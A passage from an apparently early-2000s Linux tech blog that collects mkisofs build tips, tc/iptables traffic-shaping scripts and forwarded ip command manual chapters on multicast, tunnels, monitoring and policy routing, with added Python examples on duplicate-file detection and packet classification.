    Fix1 = 1.12 old --> 1.12 gbk (dfbb) --> 1.12 md5 (COMMAN)
    Fix2 = 1.15 old --> 1.15 gbk (wwashington) --> 1.15 md5 (wwashington)
---------------------------------------------------------------------------------
[B] Some Tips.
(1) Type = Preparation
    What = Install Cygwin to compile gnu win32 program.
    Link = http://www.cygwin.com
    Link = http://www.mesky.net/SoftDown/SoftView.Asp?SoftID=1270
(2) Type = Preparation
    What = Install smake for better compiling performance.
    Link = ftp://ftp.fokus.gmd.de/pub/unix/smake/alpha/smake-1.2a16.tar.gz
    Link = http://www.mesky.net/SoftDown/SoftView.Asp?SoftID=1271 (binary)
(3) Type = Compiling
    What = mkisofs 1.12b5
    Help = As Below.
    1> tar -zxvf *.*gz
    2> cd mkisofs-1.12b5
    3> ./configure
    4> make (notes: smake also OK, make fit old format)
    5> make clean
    6> cp ?? . (notes: copy patches to mkisofs, old->gbk)
    7> make (notes: then you can see the exe result)
    8> .... (notes: do step 5 to 7 again, gbk->md5)
(4) Type = Compiling
    What = mkisofs 1.15a23
    Help = As Below.
    1> tar -zxvf *.*gz (winzip or winrar will lose filelink)
    2> cd cdrtools-1.11 (mkisofs1.15 is inside cdrtools1.11)
    3> smake (notes: make can also work but not reliable)
    4> cd mkisofs
    5> smake clean
    6> cp ?? . (notes: copy patches to mkisofs, old->gbk)
    7> smake (notes: then you can see the exe result)
    8> .... (notes: do step 5 to 7 again, gbk->md5)

Posted by windtear at 12:38 AM
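Both tools above deduplicate the source tree before writing the image: cdimage -o encodes a duplicate file only once, keyed on MD5 unless -oc asks for a binary comparison, and the patched mkisofs -O does the same during the directory scan. The following Python, an example added here and not code from cdimage or from the patched mkisofs, shows that pipeline: group by size, then by MD5, then optionally confirm byte-for-byte. The directory tree it scans is constructed in a temporary directory by make_sample_tree(), standing in for three Windows trees merged into one ISO. The point of the byte-confirmation step is a security one: MD5 is not collision resistant, so an image built on hash equality alone would silently replace one of two crafted colliding files with the other. The example cannot embed a real collision pair, so the usage note below substitutes a deliberately weak hasher to show the failure mode.

```python
"""Duplicate-file detection as done by 'cdimage -o' / 'mkisofs -O':
size, then MD5, then (like cdimage -oc) an optional byte comparison.
Added example; the sample tree is constructed in a temp directory."""
import hashlib
import os
import tempfile
from collections import defaultdict


def md5_of(path, chunk=1 << 16):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def _same_bytes(a, b, chunk=1 << 16):
    with open(a, "rb") as fa, open(b, "rb") as fb:
        while True:
            x, y = fa.read(chunk), fb.read(chunk)
            if x != y:
                return False
            if not x:
                return True


def _split_by_content(paths):
    """Partition paths into groups whose contents are byte-for-byte identical."""
    groups = []
    for p in paths:
        for g in groups:
            if _same_bytes(g[0], p):
                g.append(p)
                break
        else:
            groups.append([p])
    return groups


def find_duplicates(root, hasher=md5_of, confirm_bytes=False):
    """Return (groups, saved_bytes): each group is a list of paths that would be
    stored once in the image; saved_bytes is the space that sharing frees.
    confirm_bytes=True is the '-oc' behaviour: never trust the hash alone."""
    by_size = defaultdict(list)
    for dirpath, _, names in os.walk(root):
        for n in sorted(names):
            p = os.path.join(dirpath, n)
            by_size[os.path.getsize(p)].append(p)
    groups, saved = [], 0
    for size, paths in sorted(by_size.items()):
        if size == 0 or len(paths) < 2:      # nothing to share
            continue
        by_hash = defaultdict(list)
        for p in paths:
            by_hash[hasher(p)].append(p)
        for same_hash in by_hash.values():
            for g in (_split_by_content(same_hash) if confirm_bytes else [same_hash]):
                if len(g) > 1:
                    groups.append(g)
                    saved += size * (len(g) - 1)
    return groups, saved


def make_sample_tree():
    """Constructed stand-in for three Windows source trees (not real files):
    the same 1024-byte 'setup.exe' in each tree, plus one same-size file
    with different contents."""
    root = tempfile.mkdtemp(prefix="niso_")
    payload = b"MZ" + b"\x90" * 1022
    other = b"MZ" + b"\x00" * 1022
    for tree in ("2000_tree", "xp1_tree", "xp2_tree"):
        d = os.path.join(root, tree, "i386")
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, "setup.exe"), "wb") as f:
            f.write(payload)
    with open(os.path.join(root, "2000_tree", "readme.txt"), "wb") as f:
        f.write(other)
    return root


if __name__ == "__main__":
    root = make_sample_tree()
    groups, saved = find_duplicates(root)
    print("md5 dedup: %d group(s), %d bytes saved" % (len(groups), saved))
    weak = lambda p: "every file hashes the same"      # stands in for a collision
    print("hash-only with colliding hasher:", find_duplicates(root, hasher=weak)[0])
    print("with byte confirmation:", find_duplicates(root, hasher=weak, confirm_bytes=True)[0])
```

With the real MD5 the three setup.exe copies form one group and readme.txt stays separate. With the colliding stand-in hasher and no byte confirmation, readme.txt is merged into that group, which in a real image means a user of one tree receives the other tree's file; confirm_bytes=True catches it, at the cost the cdimage help text warns about.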
April 4, 2004
6. tc sample - iproute2 - the most powerful tool (我爱网络)
% tail rc.local
# qos cbq traffic control
sh _iptables.sh
sh _qos.sh

-----> sample 1
% cat _iptables.sh
#!/bin/sh
# Mark locally generated traffic in the mangle OUTPUT chain; the marks are
# picked up by the "fw" classifier in _qos.sh.
IPTABLES=/sbin/iptables
$IPTABLES -F OUTPUT -t mangle
$IPTABLES -A OUTPUT -t mangle -p tcp --sport 1020 -j MARK --set-mark 1
$IPTABLES -A OUTPUT -t mangle -p tcp --sport 10000:11000 -j MARK --set-mark 1
$IPTABLES -A OUTPUT -t mangle --match owner --uid-owner 500 -j MARK --set-mark 2

% cat _qos.sh
#!/bin/sh
TC=/sbin/tc
#$TC qdisc add dev eth0 root handle 1: cbq bandwidth 100Mbit allot 1514 cell 8 avpkt 1000 mpu 64
#$TC class add dev eth0 parent 1:0 classid 1:1 cbq bandwidth 5Mbit rate 5Mbit allot 1514 weight 50Kbit prio 8 maxburst 20 avpkt 1000 bounded
#$TC filter add dev eth0 protocol ip prio 3 handle 1 fw classid 1:1
# Root cbq qdisc, a 5Mbit parent class and two bounded leaf classes (4Mbit + 1Mbit).
$TC qdisc add dev eth0 root handle 100: cbq bandwidth 10Mbit avpkt 1000
$TC class add dev eth0 parent 100:0 classid 100:1 cbq bandwidth 10Mbit rate 5Mbit allot 1514 weight 5Mbit prio 8 maxburst 20 avpkt 1000
$TC class add dev eth0 parent 100:1 classid 100:11 cbq bandwidth 10Mbit rate 4Mbit allot 1514 weight 4Mbit prio 5 maxburst 20 avpkt 1000 bounded
$TC class add dev eth0 parent 100:1 classid 100:21 cbq bandwidth 10Mbit rate 1Mbit allot 1514 weight 1Mbit prio 5 maxburst 20 avpkt 1000 bounded
# sfq inside each leaf so one flow cannot starve the others in the class.
$TC qdisc add dev eth0 parent 100:11 sfq quantum 1514b perturb 15
$TC qdisc add dev eth0 parent 100:21 sfq quantum 1514b perturb 15
# fwmark 1 -> 100:11, fwmark 2 -> 100:21
$TC filter add dev eth0 protocol ip prio 25 handle 1 fw classid 100:11
$TC filter add dev eth0 protocol ip prio 25 handle 2 fw classid 100:21
#$TC filter add dev eth0 parent 100:0 protocol ip prio 100 u32 match ip src 166.111.Local.Host/32 port 20 flowid 100:10

-----> sample 2
% cat _iptables.sh
#!/bin/sh
# TH_PO/OU_PO and TH_PAS:TH_PAE/OU_PAS:OU_PAE are placeholders for the
# two services' ports and passive-mode port ranges.
IPTABLES=/sbin/iptables
$IPTABLES -F OUTPUT -t mangle
$IPTABLES -A OUTPUT -t mangle -p tcp --sport TH_PO -j MARK --set-mark 1
$IPTABLES -A OUTPUT -t mangle -p tcp --sport OU_PO -j MARK --set-mark 2
$IPTABLES -A OUTPUT -t mangle -p tcp --sport TH_PAS:TH_PAE -j MARK --set-mark 1
$IPTABLES -A OUTPUT -t mangle -p tcp --sport OU_PAS:OU_PAE -j MARK --set-mark 2

% cat _qos.sh
#!/bin/sh
TC=/sbin/tc
#$TC qdisc add dev eth0 root handle 1: cbq bandwidth 100Mbit allot 1514 cell 8 avpkt 1000 mpu 64
$TC qdisc add dev eth0 root handle 1: cbq bandwidth 100Mbit avpkt 1000
$TC class add dev eth0 parent 1:0 classid 1:1 cbq bandwidth 100Mbit rate 100Mbit allot 1514 weight 10Mbit prio 8 maxburst 20 avpkt 1000
$TC class add dev eth0 parent 1:1 classid 1:11 cbq bandwidth 100Mbit rate 70Mbit allot 1514 weight 7Mbit prio 5 maxburst 20 avpkt 1000 bounded
$TC class add dev eth0 parent 1:1 classid 1:21 cbq bandwidth 100Mbit rate 10Mbit allot 1514 weight 1Mbit prio 5 maxburst 20 avpkt 1000 bounded
$TC qdisc add dev eth0 parent 1:11 sfq quantum 1514b perturb 15
$TC qdisc add dev eth0 parent 1:21 sfq quantum 1514b perturb 15
$TC filter add dev eth0 protocol ip prio 25 handle 1 fw classid 1:11
$TC filter add dev eth0 protocol ip prio 25 handle 2 fw classid 1:21

Posted by windtear at 1:53 AM
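Two things in sample 1 are easy to misjudge by reading the scripts: MARK is a non-terminating target, so a packet matching several mangle rules ends up with the mark of the last one (a uid-500 process sending from port 1020 lands in the 1Mbit class, not the 4Mbit one), and "bounded" decides whether a class can borrow beyond its rate. The following Python traces both for sample 1; it is an example added here, not part of the original scripts, and the packet tuples are constructed. How cbq treats traffic that matches no fw filter is deliberately left out (it is returned as None).

```python
"""Trace how sample 1 classifies locally generated traffic: the mangle
OUTPUT rules set an fwmark, the tc fw filters map the mark to a cbq class.
Added example; packets below are constructed, not captured."""
from collections import namedtuple

Pkt = namedtuple("Pkt", "proto sport uid")

# iptables -t mangle -A OUTPUT ... -j MARK rules of sample 1, in chain order.
# MARK is non-terminating: every matching rule runs, so the LAST match decides.
MANGLE_OUTPUT = [
    dict(proto="tcp", sport=(1020, 1020), mark=1),
    dict(proto="tcp", sport=(10000, 11000), mark=1),
    dict(uid=500, mark=2),
]

# tc filter ... handle <mark> fw classid <class>
FW_FILTERS = {1: "100:11", 2: "100:21"}

# cbq class tree of sample 1 (rates in Mbit); "bounded" = may not borrow.
ROOT = "100:0"
ROOT_BANDWIDTH = 10            # "cbq bandwidth 10Mbit" on the root qdisc
CLASSES = {
    "100:1":  dict(parent=ROOT,    rate=5, bounded=False),
    "100:11": dict(parent="100:1", rate=4, bounded=True),
    "100:21": dict(parent="100:1", rate=1, bounded=True),
}


def rule_matches(rule, pkt):
    if "proto" in rule and rule["proto"] != pkt.proto:
        return False
    if "sport" in rule and not rule["sport"][0] <= pkt.sport <= rule["sport"][1]:
        return False
    if "uid" in rule and rule["uid"] != pkt.uid:
        return False
    return True


def mark_for(pkt):
    """fwmark after the whole chain has run (0 = never marked)."""
    mark = 0
    for rule in MANGLE_OUTPUT:
        if rule_matches(rule, pkt):
            mark = rule["mark"]          # a later match overwrites an earlier one
    return mark


def classify(pkt):
    """Class chosen by the fw filters, or None when no filter matched."""
    return FW_FILTERS.get(mark_for(pkt))


def ceiling(cid):
    """Most bandwidth a class can ever see: its own rate if bounded, otherwise
    it may borrow idle bandwidth up to its parent's ceiling (root: the link).
    This is the borrowing rule in outline, not a cbq scheduler model."""
    c = CLASSES[cid]
    if c["bounded"]:
        return c["rate"]
    return ROOT_BANDWIDTH if c["parent"] == ROOT else ceiling(c["parent"])


def check_tree(classes=CLASSES):
    """Sanity check: children must not be guaranteed more than their parent."""
    problems = []
    for cid, c in classes.items():
        kids = [k for k, v in classes.items() if v["parent"] == cid]
        total = sum(classes[k]["rate"] for k in kids)
        if kids and total > c["rate"]:
            problems.append("%s: children guaranteed %dMbit, parent rate %dMbit"
                            % (cid, total, c["rate"]))
    return problems


if __name__ == "__main__":
    for p in (Pkt("tcp", 1020, 1000), Pkt("tcp", 10500, 1000),
              Pkt("tcp", 1020, 500), Pkt("tcp", 5000, 1000)):
        print(p, "-> mark", mark_for(p), "class", classify(p))
    print("ceiling 100:1 =", ceiling("100:1"), "Mbit; problems:", check_tree())
```

The order of the mangle rules therefore matters even though none of them jumps or returns: put the rule that should win last, or give it its own chain that RETURNs. check_tree() is the kind of check worth running before a change to _qos.sh: bumping 100:21 to 2Mbit would over-commit the 5Mbit parent.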
5. ip usage 4 - iproute2 - the most powerful tool - [FWD] ip command manual (4) (我爱网络)
From: CrazyKid (疯狂小子※爱学习/爱生活), Board: Linux
Subject: [FWD] ip command manual (4)
Posted at: BBS 水木清华站 (Fri Nov 15 18:13:00 2002), on-site
http://www.linuxaid.com.cn/articles/1/2/123273063.shtml

ip command manual (4)
Abstract: This part covers multicast routing and tunnels, together with some related material on policy routing. (2002-11-12 17:04:44)
By nixe0n

10. ip mroute -- multicast routing cache management

10.1. Abbreviations: mroute, mr

10.2. Object
The objects this command operates on are multicast routing cache entries, created by a user-space multicast routing daemon (for example pimd or mrouted). At present, because of limitations in the interface to the multicast routing engine, multicast routing objects cannot be modified with the ip command; we can only view them.

10.3. Commands: show or list

10.4. ip mroute show -- list multicast routing cache entries
Abbreviations: show, list, sh, ls, l
Arguments:
to PREFIX (default) - select entries whose destination multicast address is PREFIX
iif NAME - the network interface on which the multicast packets are received
from PREFIX - select entries whose multicast route has IP source address PREFIX
Output format:
kuznet@amber:~ $ ip mroute ls
(193.232.127.6, 224.0.1.39) Iif: unresolved
(193.232.244.34, 224.0.1.40) Iif: unresolved
(193.233.7.65, 224.66.66.66) Iif: eth0 Oifs: pimreg
kuznet@amber:~ $
Multicast routing cache entries take the form (S,G), where S is the source address and G is the multicast group. iif is the interface on which multicast packets are received; if the device name is the keyword unresolved, the routing daemon could not resolve this entry. The next keyword is oif, followed by the output interfaces, separated by spaces.
Statistics: with the -statistics option we get more detailed output, including the number of packets and bytes forwarded through this route and the number of packets that arrived on the wrong interface (if any).
kuznet@amber:~ $ ip -s mr ls 224.66/16
(193.233.7.65, 224.66.66.66) Iif: eth0 Oifs: pimreg
  9383 packets, 300256 bytes
kuznet@amber:~ $

11. ip tunnel -- tunnel configuration

11.1. Abbreviations: tunnel, tunl

11.2. Object
The objects of ip tunnel are network tunnels. A tunnel encapsulates packets inside IPv4 packets and sends them using the IP protocol. For more information on tunnels see the iproute document "Tunnels over IP in Linux-2.2".

11.3. Commands: add, delete, change, show or list

11.4. ip tunnel add -- add a new tunnel; ip tunnel change -- change an existing tunnel; ip tunnel delete -- delete a tunnel
Abbreviations: add, a; change, chg; delete, del, d
Arguments:
name NAME (default) - select the tunnel device name
mode MODE - set the tunnel mode. Valid modes are ipip, sit and gre.
remote ADDRESS - set the remote endpoint address of the tunnel
local ADDRESS - set the fixed local address for tunneled packets; it must be an address on another interface of this host.
ttl N - set the TTL of tunneled packets to N, a number between 1 and 255. 0 is a special value meaning the TTL is inherited. The default for ttl is inherit.
tos T or dsfield T - set the TOS field of tunneled packets; the default is inherit.
dev NAME - bind the tunnel to device NAME, so that tunneled packets can only be routed through NAME and cannot be decapsulated on another device when the peer changes.
nopmtudisc - disable Path MTU Discovery on this tunnel. It is enabled by default. Note: this option is incompatible with a fixed ttl; if a fixed ttl is given, the system turns Path MTU Discovery on.
key K, ikey K, okey K - GRE tunnels only; set the key of a keyed GRE tunnel. K is either a number or a dotted quad in IP address form. key is used in both directions of the tunnel; ikey and okey set different keys for input and output.
csum, icsum, ocsum - GRE tunnels only; compute checksums for tunneled packets. ocsum checksums only outgoing packets, icsum only incoming packets, and csum is equivalent to icsum ocsum combined.
seq, iseq, oseq - GRE tunnels only; send/receive packets in sequence. oseq makes outgoing packets sequenced, iseq requires all incoming packets to be in sequence, and seq is equivalent to iseq oseq combined.
Example: create a point-to-point tunnel with a maximum TTL of 32
netadm@amber:~ # ip tunnel add Cisco mode sit remote 192.31.7.104 local 192.203.80.1 ttl 32

11.5. ip tunnel show -- list existing tunnels
Abbreviations: show, list, sh, ls, l
Arguments: none
Output format:
kuznet@amber:~ $ ip tunnel ls Cisco
Cisco: ipv6/ip remote 192.31.7.104 local 192.203.80.142 ttl 32
kuznet@amber:~ $
The first part of the output is the tunnel device name, followed by the tunnel mode. Then come the parameters that were set when the tunnel was configured.
Statistics:
kuznet@amber:~ $ ip -s tunl ls Cisco
Cisco: ipv6/ip remote 192.31.7.104 local 192.203.80.142 ttl 32
RX: Packets Bytes   Errors CsumErrs OutOfSeq Mcasts
    12566   1707516 0      0        0        0
TX: Packets Bytes   Errors DeadLoop NoRoute  NoBufs
    13445   1879677 0      0        0        0
kuznet@amber:~ $
The numbers in this output are the same as those of ip -s link show, but each flag is tunnel specific:
CsumErrs - for GRE tunnels with checksumming enabled, the number of packets dropped because of checksum errors.
OutOfSeq - for GRE tunnels with sequencing enabled, the number of packets dropped because they were out of sequence.
Mcasts - the number of multicast packets received on the GRE tunnel.
DeadLoop - the number of packets not transmitted because the tunnel loops back to itself.
NoRoute - the number of packets not transmitted because there is no route to the peer.
NoBufs - the number of packets not transmitted because the kernel could not allocate a buffer.

12. ip monitor and rtmon -- state monitoring
The ip command can monitor the state of devices, addresses and routes continuously. The format of this option is a little different: the option is called monitor, followed by the objects to operate on:
ip monitor [ file FILE ] [ all | OBJECT-LIST ]
OBJECT-LIST is the set of objects to monitor; it may include link, address and route. If no file argument is given, ip opens RTNETLINK, listens on it, and prints state changes to standard output.
If the file argument is used, ip does not listen on RTNETLINK; instead it opens the binary file of RTNETLINK messages named by file and prints the parsed result. Such a history file can be produced by the tool rtmon, whose command line syntax is similar to ip monitor. Ideally rtmon is started before the network configuration commands run (of course you can start rtmon at any time; it records state changes from the moment it starts). You can insert the following line into a startup script:
rtmon file /var/log/rtmon.log
If we run these commands:
[root@nixe0n root]ip route add dev eth0 to 61.133.4.7 via 211.99.114.65
[root@nixe0n root]ip route del dev eth0 to 61.133.4.7
and then analyze /var/log/rtmon.log with ip monitor, we get the following output:
[root@nixe0n root]ip monitor file /var/log/rtmon.log r
Timestamp: Wed Nov 6 20:25:54 2002 733331 us
1: lo: mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: mtu 1500 qdisc pfifo_fast
    link/ether 00:01:4f:00:15:f1 brd ff:ff:ff:ff:ff:ff
Timestamp: Wed Nov 6 20:25:58 2002 33700 us
61.133.4.7 via 211.99.114.65 dev eth0
Timestamp: Wed Nov 6 20:25:59 2002 924124 us
Deleted 61.133.4.7 via 211.99.114.65 dev eth0
[root@nixe0n root]

13. rtacct -- route realms and policy propagation
On routers running OSPF or BGP the routing table can be very large. If we need to classify routes, or count the packets passing through each route, a lot of information must be kept. Worse, if we need to distinguish packets not only by destination address but also by source address, the task becomes even more complex, almost unsolvable.
For this problem, "Cisco IOS Release 12.0 Quality of Service Solutions Configuration Guide: Configuring QoS Policy Propagation via Border Gateway Protocol" proposes a solution: migrate policy from the routing protocol into the forwarding engine. Basically, Cisco Policy Propagation via BGP is based on this approach: it makes the router keep the whole RIB (Routing Information Base) closely coupled to the forwarding engine, so that policy routing rules can inspect all route attributes, including ASPATH information and community strings.
Linux, by contrast, splits this into a Routing Information Base (RIB) maintained by a user-space routing daemon and a Forwarding Information Base (FIB) in the kernel.
That is our good fortune, because there is another solution, and it allows more flexible policy and richer semantics. In other words, routes can be classified in user space by their attributes: the ASPATH and community of BGP routes; the tags and scope of OSPF routes. And when an administrator adds routes by hand, he knows their attributes too. The number of sets partitioned by this standard (we call them realms) is small, so full classification by source and destination address becomes manageable.
Thus every route can be assigned to a realm. Usually the routing daemon does this, but for static routes it can be done by hand with ip route.
In some cases (for example when the routing daemon does not understand realms), for convenience, missing realms can be filled in by routing policy rules.
The kernel computes the source realm and destination realm of each packet with the following algorithm:
If route has a realm, destination realm of the packet is set to it.
If rule has a source realm, source realm of the packet is set to it.
If destination realm was not get from route and rule has destination realm, it is also set.
If at least one of realms is still unknown, kernel finds reversed route to the source of the packet.
If source realm is still unknown, get it from reversed route.
If one of realms is still unknown, swap realms of reversed routes and apply step 2 again.
When this procedure is complete we know the source and destination realms of the packet. If one is still unknown it is set to 0 (realm unknown).
Realms are used mainly by the route classifier of TC (Traffic Control); with the route classifier we can assign packets to different traffic classes, count packets, and set scheduling policy for them.
Compared with TC, using realms to count incoming packets is much simpler, but it is a very useful application. The kernel can collect summary packet statistics by realm. In user space we can view them with the tool rtacct. For example:
kuznet@amber:~ $ rtacct russia
Realm   BytesTo   PktsTo  BytesFrom  PktsFrom
russia  20576778  169176  47080168   153805
kuznet@amber:~ $
The result shows that this router received 153805 packets from the russia realm and forwarded 169176 packets to russia. The russia realm consists of routes whose ASPATH (autonomous system path) is in Russia.

15. References
T. Narten, E. Nordmark, W. Simpson. "Neighbor Discovery for IP Version 6 (IPv6)", RFC-2461.
S. Thomson, T. Narten. "IPv6 Stateless Address Autoconfiguration", RFC-2462.
F. Baker. "Requirements for IP Version 4 Routers", RFC-1812.
R. T. Braden. "Requirements for Internet hosts -- communication layers", RFC-1122.
"Cisco IOS Release 12.0 Network Protocols Command Reference, Part 1" and "Cisco IOS Release 12.0 Quality of Service Solutions Configuration Guide: Configuring Policy-Based Routing", http://www.cisco.com/univercd/cc/td/doc/product/software/ios120.
A. N. Kuznetsov. "Tunnels over IP in Linux-2.2", in: ftp://ftp.inr.ac.ru/ip-routing/iproute2-current.tar.gz.
A. N. Kuznetsov. "TC Command Reference", in: ftp://ftp.inr.ac.ru/ip-routing/iproute2-current.tar.gz.
"Cisco IOS Release 12.0 Quality of Service Solutions Configuration Guide: Configuring QoS Policy Propagation via Border Gateway Protocol", http://www.cisco.com/univercd/cc/td/doc/product/software/ios120.
R. Droms. "Dynamic Host Configuration Protocol.", RFC-2131
[Editor in charge: nixe0n]
--
Contact Information: ***** ******* <windtear@ipcn.org>, +86-10-6277****, **#*** Tsinghua University, Beijing, 100084, CN
Proxy: free, secure ... proxy.ipcn.org port 3128, user windtear; for the password visit http://proxy.ipcn.org
※ Source: BBS 水木清华站 smth.edu.cn [FROM: 166.111.48.196]

Posted by windtear at 1:38 AM
4. ip usage 3 - iproute2 - the most powerful tool - [FWD] ip command manual (3) (我爱网络)
From: CrazyKid (疯狂小子※爱学习/爱生活), Board: Linux
Subject: [FWD] ip command manual (3)
Posted at: BBS 水木清华站 (Wed Nov 6 11:18:06 2002), on-site mail
http://linuxaid.com.cn/articles/6/0/608210173.shtml

ip command manual (3)
Abstract: The parts on routing policy management and multicast address management (2002-11-05 10:09:51)
By nixe0n

8. ip rule -- routing policy database management

8.1. Abbreviations: rule, ru

8.2. Object
The rules in the routing policy database control the route selection algorithm.
The routing algorithm used on the Internet is generally based on the destination address of the packet. In theory the TOS field could also take part in the decision, but this has no practical application. For details of the classic routing algorithm see RFC-1812.
In some cases, however, we need to select routes not only by the destination address of the packet but also by other fields: source address, IP protocol, transport-layer port, even packet payload. This is called policy routing.
Note: policy routing is not the same thing as routing policy.
In this situation the traditional destination-based routing table cannot meet the requirement; it is replaced by the routing policy database (RPDB), which selects the routing to perform by executing certain rules. These rules can have many different states, and they have no inherent order; that is decided by the system administrator. The RPDB can match the following fields:
- source address of the packet
- destination address of the packet
- Type of Service
- incoming network interface
Matching the IP protocol and transport-layer port is also possible, but it relies on iptables or ipchains marking certain packets with fwmark and redirecting them.
Each routing policy consists of a selector and an action. The system searches the routing policy database in order, matching the selector against the keys {source address, destination address, incoming interface, tos, fwmark}; on a successful match it performs the operation defined by the action. The action either returns success, or fails and terminates the policy lookup. Otherwise the system continues to search the routing policy database.
How are actions defined? The most primitive action is to select a nexthop and an output device. Cisco IOS uses this approach; let us call it "match & set". The Linux approach is more flexible: the actions Linux allows include a lookup in a destination-based routing table, selecting a route from that table by the longest-match rule. So match & set is only the simplest special case.
At system startup the kernel configures three default rules in the routing policy database:
Priority | Selector | Action | Explanation
0 | matches anything | look up routing table local (ID 255) | Table local is a special routing table containing high-priority control routes for local and broadcast addresses. Rule 0 is very special; it cannot be deleted or overridden.
32766 | matches anything | look up routing table main (ID 254) | Table main (ID 254) is an ordinary table containing all non-policy routes. The system administrator may delete this rule or override it with other rules.
32767 | matches anything | look up routing table default (ID 253) | Table default (ID 253) is an empty table, reserved for post-processing. Packets not matched by the preceding default rules are processed by this rule. This rule can also be deleted.
Do not confuse routing tables and rules: rules point to routing tables, several rules may refer to one routing table, and some routing tables may have no rule pointing to them. If the system administrator deletes all the rules referring to a table, the table becomes useless but still exists until all the routes in it are deleted; only then does it disappear.

8.3. Rule types
The routing policy rule database may contain the following types of rules:
unicast - return the route found in the referenced routing table
blackhole - discard the packet silently
unreachable - generate an ICMP "Network is unreachable" error
prohibit - generate an ICMP "Communication is administratively prohibited" error
nat - translate the source address of the packet to another value. See Appendix C for details.

8.4. Commands: add, delete, show (or list)

8.5. ip rule add -- insert a new rule; ip rule delete -- delete a rule
Abbreviations: add, a; delete, del, d
Arguments:
type TYPE (default) - the type of this rule. The valid types were introduced in the previous section.
from PREFIX - the source address to match
iif NAME - select the device the packet arrives on. If the interface is the loopback device, the rule only matches packets originating on this host. This means you can build separate routing tables for locally generated packets and for forwarded packets, isolating the two completely.
tos TOS or dsfield TOS - select the TOS value to match
fwmark MARK - select the fwmark value to match
priority PREFERENCE - set the priority of this rule. Each rule's priority should be set explicitly to a unique value. In practice, for historical reasons, ip rule add does not require a priority value, and it need not be unique. If the user gives no priority in the command, the kernel chooses one. If the user gives a priority that already exists, the kernel does not reject the request but inserts the new rule before the rules of the same priority.
table TABLEID - the identifier of the routing table to look up if the rule selector matches.
realms FROM/TO - the realms value to select if the rule matches and the routing table lookup succeeds.
nat ADDRESS - set the IP address block for network address translation. ADDRESS is either the address block to translate to, or a local address, or even 0.
Warning: changes made to the routing policy database with the two commands above do not take effect immediately. They take effect only after the routing cache is flushed with ip route flush cache.
Examples:
Route packets with source addresses in 192.203.80/24 through table inr.ruhep:
ip ru add from 192.203.80/24 table inr.ruhep prio 220
Translate the source address of packets from 193.233.7.83 to 192.203.80.144 and route them through table 1:
ip ru add from 193.233.7.83 nat 192.203.80.144 table 1 prio 320
Delete the useless default rule:
ip ru del prio 32767

8.7. ip rule show -- list routing rules
Abbreviations: show, list, sh, ls, l
Arguments: good news, this command has none.
Output format:
kuznet@amber:~ $ ip ru ls
0:      from all lookup local
200:    from 192.203.80.0/24 to 193.233.7.0/24 lookup main
210:    from 192.203.80.0/24 to 192.203.80.0/24 lookup main
220:    from 192.203.80.0/24 lookup inr.ruhep realms inr.ruhep/radio-msu
300:    from 193.233.7.83 to 193.233.7.0/24 lookup main
310:    from 193.233.7.83 to 192.203.80.0/24 lookup main
320:    from 193.233.7.83 lookup inr.ruhep map-to 192.203.80.144
32766:  from all lookup main
kuznet@amber:~ $
The number at the start of each line is the priority of the rule, followed by the selector. The keyword lookup is followed by the routing table identifier. If the rule performs network address translation, the keyword map-to gives the translated address.
The example above is quite simple: 192.203.80.0/24 and 193.233.7.0/24 form the internal network, but they send packets out through different routes. When host 193.233.7.83 talks to the outside world, its address is translated to 192.203.80.144.

9. ip maddress -- multicast address management

9.1. Object: the objects managed by this command are multicast addresses.

9.2. Commands: add, delete, show (or list)

9.3. ip maddress show -- list multicast addresses
Abbreviations: show, list, sh, ls, l
Arguments:
dev NAME (default) - device name
Output format:
kuznet@alisa:~ $ ip maddr ls dummy
2: dummy
    link 33:33:00:00:00:01
    link 01:00:5e:00:00:01
    inet 224.0.0.1 users 2
    inet6 ff02::1
kuznet@alisa:~ $
The first line of the output is the device index and device name. The following lines are the multicast addresses, each beginning with a protocol identifier. The keyword link means a link-layer multicast address.
If a multicast address has several users, the number of users is listed after the keyword users. The keyword static, absent from this example, indicates that the address was added with ip maddr add.

9.4. ip maddress add -- add a multicast address; ip maddress delete -- delete a multicast address
Abbreviations: add, a; delete, del, d
Description: with these two commands we can add/remove link-layer multicast addresses that a network interface listens on. The commands manage link-layer addresses only.
Arguments:
address LLADDRESS (default) - the link-layer multicast address
dev NAME - the device that joins/leaves this multicast address
Example: let us continue the example of the previous section
netadm@alisa:~ # ip maddr add 33:33:00:00:00:01 dev dummy
netadm@alisa:~ # ip -O maddr ls dummy
2: dummy
    link 33:33:00:00:00:01 users 2 static
    link 01:00:5e:00:00:01
netadm@alisa:~ # ip maddr del 33:33:00:00:00:01 dev dummy
Note: neither the ip command nor the kernel checks the validity of multicast addresses. This means you can use a unicast address in place of a multicast address. Most drivers ignore unicast addresses, but some (for example tulip) add the unicast address to their filter. The effect is somewhat odd: if you use the address of another host or router as a multicast address, you can receive the packets sent to them. This is not a bug but a kernel feature; it can be used for network monitoring.
[Editor in charge: nixe0n]

Posted by windtear at 1:38 AM
3. ip usage 2 - iproute2 - the most powerful tool - [FWD] ip command manual (2) (我爱网络)
